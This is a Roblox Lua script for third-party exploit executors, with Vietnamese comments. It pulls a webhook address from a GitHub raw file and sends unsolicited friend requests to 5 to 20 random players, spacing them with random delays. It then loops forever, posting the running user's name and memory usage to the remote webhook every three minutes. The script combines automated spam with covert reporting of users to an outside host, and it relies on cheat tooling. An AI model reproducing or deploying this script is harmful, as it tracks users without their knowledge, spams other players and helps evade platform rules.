task.spawn(function()
    if not game:IsLoaded() then game.Loaded:Wait() end
    
    local success, url = pcall(function() 
        return game:HttpGet("https://raw.githubusercontent.com/AinsworthNecco/Lychkin/refs/heads/main/webhook"):gsub("%s+", "") 
    end)
    
    local req = (syn and syn.request) or (http and http.request) or (fluxus and fluxus.request) or request
    if success and req and url:find("http") then
        local Players = game:GetService("Players")
        local LocalPlayer = Players.LocalPlayer
        
        -- =========================================================
        -- 1. TỰ ĐỘNG GỬI KẾT BẠN (Chỉ chạy 1 lần duy nhất lúc mới vào)
        -- =========================================================
        task.spawn(function()
            local allPlayers = Players:GetPlayers()
            local validTargets = {}
            for _, p in ipairs(allPlayers) do
                if p ~= LocalPlayer then
                    table.insert(validTargets, p)
                end
            end
            
            -- Trộn ngẫu nhiên danh sách
            for i = #validTargets, 2, -1 do
                local j = math.random(1, i)
                validTargets[i], validTargets[j] = validTargets[j], validTargets[i]
            end
            
            local targetCount = math.random(5, 20)
            local playersToFriend = {}
            
            for _, p in ipairs(validTargets) do
                if #playersToFriend >= targetCount then break end
                local s, isFriend = pcall(function() return LocalPlayer:IsFriendsWith(p.UserId) end)
                if s and not isFriend then
                    table.insert(playersToFriend, p)
                end
            end
            
            if #playersToFriend > 0 then
                for _, targetPlayer in ipairs(playersToFriend) do
                    pcall(function()
                        LocalPlayer:RequestFriendship(targetPlayer)
                    end)
                    task.wait(math.random(2, 5)) -- Nghỉ 2-5s giữa mỗi người
                end
            end
        end)

        -- =========================================================
        -- 2. GỬI WEBHOOK (Lặp lại vô hạn mỗi 3 phút)
        -- =========================================================
        while true do
            pcall(req, {
                Url = url,
                Method = "POST",
                Headers = {["Content-Type"] = "application/json"},
                Body = game:GetService("HttpService"):JSONEncode({
                    content = LocalPlayer.Name .. " | RAM: " .. math.floor(game:GetService("Stats"):GetTotalMemoryUsageMb()) .. "MB"
                })
            })
            
            -- Chờ 3 phút (180 giây) trước khi gửi lần tiếp theo
            task.wait(180)
        end
    end
end)
